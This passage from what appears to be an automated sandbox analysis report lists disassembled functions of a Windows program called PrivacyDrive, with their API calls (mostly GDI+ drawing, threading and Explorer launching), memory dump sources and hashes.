                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: Gdip$CreateDeleteDrawFormatString$FillImageModeRectangleSmoothing$AlignBrushDashPen1SolidStyle
                                • String ID: &1C
                                • API String ID: 1440256547-3926521048
                                • Opcode ID: 047926612a78ebb6fd7e44dd68211650be52230eac5ff03b792717a8f63b8e49
                                • Instruction ID: 74fa3053ec13297bfe3fdf984fd85f900a1049ffd97a30dd2928f0e2f41cc866
                                • Opcode Fuzzy Hash: 047926612a78ebb6fd7e44dd68211650be52230eac5ff03b792717a8f63b8e49
                                • Instruction Fuzzy Hash: 5FA16C75600609EFDB15CF64CC85FAABBB9EF48315F00821EF9269B290DB74AA04DF54
                                Function 004AE210 Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 222COMMON
                                Download Yara Rule
                                APIs
                                • ShellExecuteW.SHELL32(00000000,OPEN,Explorer,00000038,0056C344,00000005), ref: 004AE35D
                                • ShellExecuteW.SHELL32(00000000,OPEN,Explorer,0054A318,0056C344,00000005), ref: 004AE3B0
                                • ShellExecuteW.SHELL32(00000000,OPEN,Explorer,0054A318,0056C344,00000005), ref: 004AE456
                                • ShellExecuteW.SHELL32(00000000,OPEN,Explorer,?,0056C344,00000005), ref: 004AE4E8
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: ExecuteShell
                                • String ID: !@$/select,"%s"$Explorer$OPEN
                                • API String ID: 587946157-2739410801
                                • Opcode ID: 6452da547931195d0c5c5ff6063dd79861fa737d04357eac0afe383d768fdde5
                                • Instruction ID: 2826955243ba4db129723b3504ea30e3d4886e60a98cb06a18c389304b2707ee
                                • Opcode Fuzzy Hash: 6452da547931195d0c5c5ff6063dd79861fa737d04357eac0afe383d768fdde5
                                • Instruction Fuzzy Hash: D1910171A00204DFDF10DF99D949B9EBBB4BF25318F20066EE825A72D0E3746908CBA5
                                Function 004A6480 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 192sleepsynchronizationthreadCOMMON
                                Download Yara Rule
                                APIs
                                • Sleep.KERNEL32(00000032,00000000,?,7563D392,00000000,00000000), ref: 004A6518
                                • CreateThread.KERNEL32(00000000,00000000,004A5ED0,?,00000000,00000000), ref: 004A6548
                                • WaitForSingleObject.KERNEL32(00000000,00000032), ref: 004A6564
                                • PeekMessageW.USER32(00000002,00000000,00000000,00000000,00000002), ref: 004A6579
                                • EnterCriticalSection.KERNEL32(005BE2CC), ref: 004A6597
                                  • Part of subcall function 004A75F0: EnterCriticalSection.KERNEL32(005BE2CC,?,?,?,?,?,?,00000000,00000000), ref: 004A766C
                                • LeaveCriticalSection.KERNEL32(?,?), ref: 004A6655
                                • SetLastError.KERNEL32(00000000), ref: 004A666F
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: CriticalSection$Enter$CreateErrorLastLeaveMessageObjectPeekSingleSleepThreadWait
                                • String ID: !@
                                • API String ID: 956063979-1028639617
                                • Opcode ID: 1c892b0a494d95129ab7aebc55ad6221570328481583d5927a730cb2bd0ac8f8
                                • Instruction ID: aebf58b705ae175c566f4567bfb3b99d4fa2f247bee2bd3eaeb78ed60df37bdb
                                • Opcode Fuzzy Hash: 1c892b0a494d95129ab7aebc55ad6221570328481583d5927a730cb2bd0ac8f8
                                • Instruction Fuzzy Hash: 68718A74E00208DFDB10DFA8D985B9EBBB5FF19704F19812AE505EB390D774AA04CB95
                                Function 0042A420 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 97COMMON
                                Download Yara Rule
                                APIs
                                • GetDC.USER32(00000000), ref: 0042A45C
                                • GdipCreateFromHDC.GDIPLUS(00000000,?), ref: 0042A47A
                                • GdipCreateStringFormat.GDIPLUS(00000000,00000000,?), ref: 0042A4A7
                                • GdipMeasureString.GDIPLUS(00000000,Test,000000FF,?,?,00000000,?,00000000,00000000), ref: 0042A4FE
                                • ReleaseDC.USER32(00000000,00000000), ref: 0042A522
                                • GdipDeleteStringFormat.GDIPLUS(?), ref: 0042A531
                                • GdipDeleteGraphics.GDIPLUS(00000000), ref: 0042A540
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: Gdip$String$CreateDeleteFormat$FromGraphicsMeasureRelease
                                • String ID: Test
                                • API String ID: 2860005999-2018365746
                                • Opcode ID: 1170c894e4341502edd069b38d8921440693ac9ea861cefa6b29807d3eafabad
                                • Instruction ID: b8c2d48d77c7336f129466dd9d56dc9088578dba89927b40d2fcb0531f9cf7ca
                                • Opcode Fuzzy Hash: 1170c894e4341502edd069b38d8921440693ac9ea861cefa6b29807d3eafabad
                                • Instruction Fuzzy Hash: 1A315C716083409FD310CF68DC44B1BFBE8FB99765F100A1EF994E22A0E7B5D9488B56
                                Function 004CEBB0 Relevance: 13.7, APIs: 9, Instructions: 203COMMON
                                Download Yara Rule
                                APIs
                                • GdipCreateRegion.GDIPLUS(?), ref: 004CEBF3
                                • GdipGetClip.GDIPLUS(?,?), ref: 004CEC1A
                                • GdipSetClipRectI.GDIPLUS(?,?,?,?,?,00000000), ref: 004CEC7B
                                • GdipTranslateWorldTransform.GDIPLUS(?,?,?,?,?,?,?,?,?,?,00000000,0054C878,000000FF,?,004CE251,?), ref: 004CECB0
                                • GdipTranslateWorldTransform.GDIPLUS(?,?,?,?,?,?,?,?,?,?,?,?,00000000,0054C878,000000FF), ref: 004CED04
                                • GdipSetClipRegion.GDIPLUS(?,00000000,00000000), ref: 004CED8C
                                • GdipGraphicsClear.GDIPLUS(?,00000000), ref: 004CEDB3
                                • GdipDrawImage.GDIPLUS(?,00000000), ref: 004CEDEC
                                • GdipDeleteRegion.GDIPLUS(00000000), ref: 004CEE2C
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: Gdip$ClipRegion$TransformTranslateWorld$ClearCreateDeleteDrawGraphicsImageRect
                                • String ID:
                                • API String ID: 1997033163-0
                                • Opcode ID: a5fe25b07bf309373de5cb3ed6c0f2f5c49db52dd81819346cf14c7d097b02ea
                                • Instruction ID: 3b760042a636472ae5f59660e2c08b4a3577a1f097ca54f87d86c09295d0c42f
                                • Opcode Fuzzy Hash: a5fe25b07bf309373de5cb3ed6c0f2f5c49db52dd81819346cf14c7d097b02ea
                                • Instruction Fuzzy Hash: 0D815675600702AFD754DF25C884BAAFBE9FF49740F04462EE956A72A0EB30F854CB91
                                Function 0041E7B0 Relevance: 13.7, APIs: 9, Instructions: 195COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 004CBC00: GdipCreateSolidFill.GDIPLUS(?,FFFFFFFF), ref: 004CBC55
                                  • Part of subcall function 004CBC00: GdipFillRectangle.GDIPLUS(?,00000000), ref: 004CBCAB
                                  • Part of subcall function 004CBC00: GdipDeleteBrush.GDIPLUS(00000000), ref: 004CBCC7
                                  • Part of subcall function 004CB9E0: GdipCreatePen1.GDIPLUS(7563D392,7563D392,00000000,7563D392), ref: 004CBA22
                                  • Part of subcall function 004CB9E0: GdipSetPenDashStyle.GDIPLUS(00000000,?), ref: 004CBA38
                                  • Part of subcall function 004CB9E0: GdipDrawRectangle.GDIPLUS(?,?), ref: 004CBA8B
                                  • Part of subcall function 004CB9E0: GdipDeletePen.GDIPLUS(?), ref: 004CBAA2
                                • GdipGetImageHeight.GDIPLUS(?,7563D392,00000000,00000000,?,?,FFE7F1FA,?,00000000,?,00000000,00000000,?,?), ref: 0041E85B
                                • GdipDrawImage.GDIPLUS(?,00000000), ref: 0041E8A4
                                • GdipCreateStringFormat.GDIPLUS(00000000,00000000,?), ref: 0041E8C2
                                • GdipSetStringFormatTrimming.GDIPLUS(?,00000004), ref: 0041E8DA
                                • GdipCreatePen1.GDIPLUS(50000000,?,00000000,FF323232), ref: 0041E9A8
                                • GdipSetPenDashStyle.GDIPLUS(?,00000002,?,00000000,FF323232), ref: 0041E9BD
                                • GdipDrawRectangle.GDIPLUS(?,?,?,?,?,?,?,?,?,?,?,?,?,0053C460,000000FF), ref: 0041EA11
                                • GdipDeletePen.GDIPLUS(?), ref: 0041EA27
                                • GdipDeleteStringFormat.GDIPLUS(00000000,?,00000046,?,?,?,?,FF323232,?,00000046,?,?,?,?,FF007ACC), ref: 0041EA39
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: Gdip$CreateDelete$DrawFormatRectangleString$DashFillImagePen1Style$BrushHeightSolidTrimming
                                • String ID:
                                • API String ID: 2933048271-0
                                • Opcode ID: 77cd7bd38adf20e8aa9f8d371aa45941266994db49abaef2069ec16743e11f5e
                                • Instruction ID: c8dc82a152294b9af04c729f5b6bf6fe31f2a742b568a157ee1cffdbb42a40b4
                                • Opcode Fuzzy Hash: 77cd7bd38adf20e8aa9f8d371aa45941266994db49abaef2069ec16743e11f5e
                                • Instruction Fuzzy Hash: 52817EB0204706AFD714CF25CC45F5ABBE4FF98714F104A1DF996972A0E730A948CB56
                                Function 0041EA60 Relevance: 13.7, APIs: 9, Instructions: 187COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 004CBC00: GdipCreateSolidFill.GDIPLUS(?,FFFFFFFF), ref: 004CBC55
                                  • Part of subcall function 004CBC00: GdipFillRectangle.GDIPLUS(?,00000000), ref: 004CBCAB
                                  • Part of subcall function 004CBC00: GdipDeleteBrush.GDIPLUS(00000000), ref: 004CBCC7
                                  • Part of subcall function 004CB9E0: GdipCreatePen1.GDIPLUS(7563D392,7563D392,00000000,7563D392), ref: 004CBA22
                                  • Part of subcall function 004CB9E0: GdipSetPenDashStyle.GDIPLUS(00000000,?), ref: 004CBA38
                                  • Part of subcall function 004CB9E0: GdipDrawRectangle.GDIPLUS(?,?), ref: 004CBA8B
                                  • Part of subcall function 004CB9E0: GdipDeletePen.GDIPLUS(?), ref: 004CBAA2
                                • GdipGetImageHeight.GDIPLUS(?,?,00000000,00000000,?,?,FFC6E0F1,?,00000000,?,00000000,00000000), ref: 0041EAEA
                                • GdipDrawImage.GDIPLUS(?,00000000), ref: 0041EB2F
                                • GdipCreateStringFormat.GDIPLUS(00000000,00000000,?), ref: 0041EB4D
                                • GdipSetStringFormatTrimming.GDIPLUS(?,00000004), ref: 0041EB65
                                • GdipCreatePen1.GDIPLUS(50000000,?,00000000,FF323232), ref: 0041EC37
                                • GdipSetPenDashStyle.GDIPLUS(?,00000002,?,00000000,FF323232), ref: 0041EC4C
                                • GdipDrawRectangle.GDIPLUS(?,?,?,?,?,?,?,?,?,?,?,?,?,0053C460,000000FF), ref: 0041ECA0
                                • GdipDeletePen.GDIPLUS(?), ref: 0041ECB6
                                • GdipDeleteStringFormat.GDIPLUS(00000000,?,00000046,?,?,?,?,FF323232,?,00000046,?,?,?,?,FF2B5D8E), ref: 0041ECC8
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: Gdip$CreateDelete$DrawFormatRectangleString$DashFillImagePen1Style$BrushHeightSolidTrimming
                                • String ID:
                                • API String ID: 2933048271-0
                                • Opcode ID: 8678ed94756cb3ca496aa687fe91f3abea0a992045d671d493c6aec0f3073713
                                • Instruction ID: e2856614cb35424f23431b49b84df5e0b065689b9bdae76c9928934769a9038d
                                • Opcode Fuzzy Hash: 8678ed94756cb3ca496aa687fe91f3abea0a992045d671d493c6aec0f3073713
                                • Instruction Fuzzy Hash: 78715A70208706AFD715CF25CC85B6BBBE8FF88714F10461DF99A97290E734A848DB66
                                Function 0041F270 Relevance: 13.7, APIs: 2, Strings: 7, Instructions: 160COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 004C1DB0: WideCharToMultiByte.KERNEL32(00000003,00000000,?,000000FF,?,00000000,00000000,00000000,?,?), ref: 004C1E7F
                                • EnterCriticalSection.KERNEL32(005BDCCC,ENGLISH,00000007,English.xml,0000000B,Languages\,0000000A,005BDD4C,00000000,000000FF,005BDD7C,7563D392), ref: 0041F3CE
                                • LeaveCriticalSection.KERNEL32(005BDCCC,?,?), ref: 0041F3FD
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: CriticalSection$ByteCharEnterLeaveMultiWide
                                • String ID: ENGLISH$English.xml$FileName$General\Language$Languages\$PZ$Value
                                • API String ID: 3162664464-823105448
                                • Opcode ID: d58b0a562f7a3f3d16fdd488f3c115c605477fc0a20af14e63d6845a59a3c83f
                                • Instruction ID: 1d496fb5c4783d14e9ad2d6040b123dae3e84bc46c03fc0296c52f160277644a
                                • Opcode Fuzzy Hash: d58b0a562f7a3f3d16fdd488f3c115c605477fc0a20af14e63d6845a59a3c83f
                                • Instruction Fuzzy Hash: CF613770D00248DEEB10DFE4C859BDEBBB4BF14718F100529E415BB291D7B96A49CBA5
                                Function 0041E570 Relevance: 13.7, APIs: 9, Instructions: 158COMMON
                                Download Yara Rule
                                APIs
                                • GdipGetImageHeight.GDIPLUS(?,?,?,?,?,?,?,?,?,?,?,0053C460,000000FF), ref: 0041E5B4
                                • GdipDrawImage.GDIPLUS(?,00000000), ref: 0041E5FB
                                • GdipCreateStringFormat.GDIPLUS(00000000,00000000,?), ref: 0041E619
                                • GdipSetStringFormatTrimming.GDIPLUS(?,00000004), ref: 0041E631
                                • GdipCreatePen1.GDIPLUS(FF505050,?,00000000,FF464646), ref: 0041E6FF
                                • GdipSetPenDashStyle.GDIPLUS(?,00000002,?,00000000,FF464646), ref: 0041E714
                                • GdipDrawRectangle.GDIPLUS(?,?,?,?,?,?,?,?,?,?,?,?,?,0053C460,000000FF), ref: 0041E768
                                • GdipDeletePen.GDIPLUS(?), ref: 0041E77E
                                • GdipDeleteStringFormat.GDIPLUS(00000000,?,00000046,?,?,?,?,FF464646,?,00000046,?,?,?,?,FF007ACC), ref: 0041E790
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: Gdip$FormatString$CreateDeleteDrawImage$DashHeightPen1RectangleStyleTrimming
                                • String ID:
                                • API String ID: 2679673769-0
                                • Opcode ID: f30b74f11c38feade10581bd63fe94443a1d1bed803c3e578bc0585de21dd0e0
                                • Instruction ID: a784becf70f3238f7b51dac09e708a2ae01ae68730202bd750031b43e5c3722b
                                • Opcode Fuzzy Hash: f30b74f11c38feade10581bd63fe94443a1d1bed803c3e578bc0585de21dd0e0
                                • Instruction Fuzzy Hash: B4617B71208702EFDB11CF25CC44B5ABBE4FF99714F004A2DF99A932A0E774A848DB56
                                Function 0041B550 Relevance: 13.6, APIs: 9, Instructions: 127COMMON
                                Download Yara Rule
                                APIs
                                • GetDC.USER32(00000000), ref: 0041B57C
                                • GdipCreateFromHDC.GDIPLUS(00000000,?), ref: 0041B598
                                • GdipCreateStringFormat.GDIPLUS(00000000,00000000,?), ref: 0041B5E5
                                • GdipSetTextRenderingHint.GDIPLUS(?,00000005), ref: 0041B5F7
                                • GdipMeasureString.GDIPLUS(?,?,000000FF,00000000,?,00000000,00000000,?,?), ref: 0041B63D
                                • GdipGetImageWidth.GDIPLUS(?,00000000), ref: 0041B664
                                • ReleaseDC.USER32(00000000,00000000), ref: 0041B696
                                • GdipDeleteStringFormat.GDIPLUS(00000000), ref: 0041B6A3
                                • GdipDeleteGraphics.GDIPLUS(?), ref: 0041B6B3
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: Gdip$String$CreateDeleteFormat$FromGraphicsHintImageMeasureReleaseRenderingTextWidth
                                • String ID:
                                • API String ID: 4226289993-0
                                • Opcode ID: 25904d8595792bb77d6cf88693a8d6d9b459301a488abf0d0783ee1b5fb626c4
                                • Instruction ID: a70a1824d574f4a95f4a6aff59bd4f0141cdcc5c27e7c1e21561ca3b9456bd18
                                • Opcode Fuzzy Hash: 25904d8595792bb77d6cf88693a8d6d9b459301a488abf0d0783ee1b5fb626c4
                                • Instruction Fuzzy Hash: C7516B71A00209DFDB01CF98D998BEEBBF4FB49711F10426AE805E72A0E7716904DFA0
                                Function 00467A40 Relevance: 13.6, APIs: 9, Instructions: 115COMMON
                                Download Yara Rule
                                APIs
                                • GetDC.USER32(00000000), ref: 00467A76
                                • GdipCreateFromHDC.GDIPLUS(00000000,?), ref: 00467A94
                                • GdipCreateStringFormat.GDIPLUS(00000000,00000000,?), ref: 00467AE9
                                • GdipSetTextRenderingHint.GDIPLUS(00000000,00000005), ref: 00467AFB
                                • GdipSetStringFormatTrimming.GDIPLUS(?,00000002), ref: 00467B10
                                • GdipMeasureString.GDIPLUS(00000000,00000000,000000FF,00000000,?,00000000,?,?,?), ref: 00467B52
                                • ReleaseDC.USER32(00000000,00000000), ref: 00467B64
                                • GdipDeleteStringFormat.GDIPLUS(?), ref: 00467BAF
                                • GdipDeleteGraphics.GDIPLUS(00000000), ref: 00467BBE
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: Gdip$String$Format$CreateDelete$FromGraphicsHintMeasureReleaseRenderingTextTrimming
                                • String ID:
                                • API String ID: 153191451-0
                                • Opcode ID: d07fed15a014139f23464f3431247c6c7a17ed6c8e922e04b791546cd2e353f8
                                • Instruction ID: 9bdd4b58217074fa9055cd543657364a1f13981c0e7dc88f0ebbfea74f2aa07f
                                • Opcode Fuzzy Hash: d07fed15a014139f23464f3431247c6c7a17ed6c8e922e04b791546cd2e353f8
                                • Instruction Fuzzy Hash: C0416A711183449FD301CF25CC98B2BBBF4FF9A759F000A1DF895962A0E7B5A848CB52
                                Function 0041A790 Relevance: 13.6, APIs: 9, Instructions: 112COMMON
                                Download Yara Rule
                                APIs
                                • GetDC.USER32(00000000), ref: 0041A7BA
                                • GdipCreateFromHDC.GDIPLUS(00000000,?), ref: 0041A7D6
                                • GdipCreateStringFormat.GDIPLUS(00000000,00000000,?), ref: 0041A820
                                • GdipSetTextRenderingHint.GDIPLUS(00000000,00000005), ref: 0041A830
                                • GdipSetStringFormatTrimming.GDIPLUS(00000000,00000002), ref: 0041A843
